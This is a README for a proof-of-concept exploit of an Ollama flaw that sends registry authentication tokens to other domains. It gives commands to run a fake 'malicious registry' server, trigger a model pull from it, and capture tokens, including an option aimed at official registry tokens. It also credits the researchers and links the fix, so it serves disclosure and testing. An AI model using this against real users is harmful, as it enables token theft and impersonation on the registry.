# CVE-2025-51471 - Ollama Cross-Domain Token Exposure PoC

![CVE-2025-51471](https://img.shields.io/badge/CVE-2025--51471-red)
![Ollama](https://img.shields.io/badge/Ollama-All_Versions-blue)
![CVSS](https://img.shields.io/badge/CVSS-6.9%20Medium-orange)

**Author:** ajtazer

## 🔥 Overview

This repository contains a Proof of Concept (PoC) for **CVE-2025-51471**, a Cross-Domain Authentication Token Exposure vulnerability that affects **all versions of Ollama** (including the latest).

## 📋 Vulnerability Description

When Ollama pulls a model from an HTTPS server that responds with `401 Unauthorized`, it follows the `WWW-Authenticate` header's `realm` URL **without validating if it belongs to the same domain**[...]

This allows an attacker to:
1. Set up a malicious "registry" server
2. Trick a user into pulling a model from that server
3. Return a `401` response with a `WWW-Authenticate` header pointing to attacker-controlled endpoint
4. Ollama blindly sends its Ed25519 signed authentication token to the attacker
5. The attacker captures the token

### Impact

- **Access private models** on `registry.ollama.ai`
- **Push malicious models** under the victim's identity
- **Impersonate the victim** on the Ollama registry

## 🚀 Quick Start

### Prerequisites

- Python 3.7+
- Flask (`pip install flask`)
- Ollama (any version)

### Installation

```bash
git clone https://github.com/ajtazer/CVE-2025-51471-PoC.git
cd CVE-2025-51471-PoC
pip install flask
```

### Running the PoC

1. **Start the malicious registry server (HTTP mode):**

```bash
python3 malicious_registry.py --no-ssl
```

2. **In another terminal, ensure Ollama is running:**

```bash
ollama serve
```

3. **Trigger the vulnerability:**

```bash
# Using curl API
curl http://localhost:11434/api/pull -d '{"model": "localhost:8080/malicious/model", "insecure": true}'

# OR using ollama CLI
ollama pull --insecure localhost:8080/malicious/model
```

4. **Watch the server terminal for captured tokens!**


## 🎬 Demo (PoC Video)

I demonstrated this PoC in a short video — watch it here:

[YouTube — PoC demo](https://youtu.be/kC80FSrWbNk)

> **Note (macOS HTTPS mode):** If using HTTPS mode, add the generated cert to your keychain or use HTTP mode with `--no-ssl`.

## 📖 Usage Options

```
python3 malicious_registry.py [-h] [--port PORT] [--no-ssl] [--steal-official]

Options:
  --port, -p PORT       Port to listen on (default: 8080)
  --no-ssl              Use HTTP instead of HTTPS
  --steal-official, -s  Redirect to steal registry.ollama.ai tokens
  --no-verbose          Disable verbose output
```

## 🔧 API Endpoints

| Endpoint | Description |
|----------|-------------|
| `/v2/*` | Fake registry endpoint (triggers exploit) |
| `/v2/token` | Token capture endpoint |
| `/tokens` | View all captured tokens (JSON) |
| `/health` | Server health check |

## 🛡️ Mitigation

1. Only pull models from trusted sources
2. Be cautious when pulling models from third-party registries
3. See [PR #10750](https://github.com/ollama/ollama/pull/10750) for the official fix

## 📝 Credits

- **Author:** ajtazer
- **Original Researchers:** 
  - Mohammed Benhelli (@FuzzingLabs)
  - Patrick Ventuzelo (@FuzzingLabs)
  - [Huntr Report](https://huntr.com/bounties/94eea285-fd65-4e01-a035-f533575ebdc2)

## ⚠️ Disclaimer

This PoC is for **educational and authorized security testing purposes only**. Do NOT use against systems you don't own.

---

Made with ❤️ using [Antigravity](https://antigravity.google)
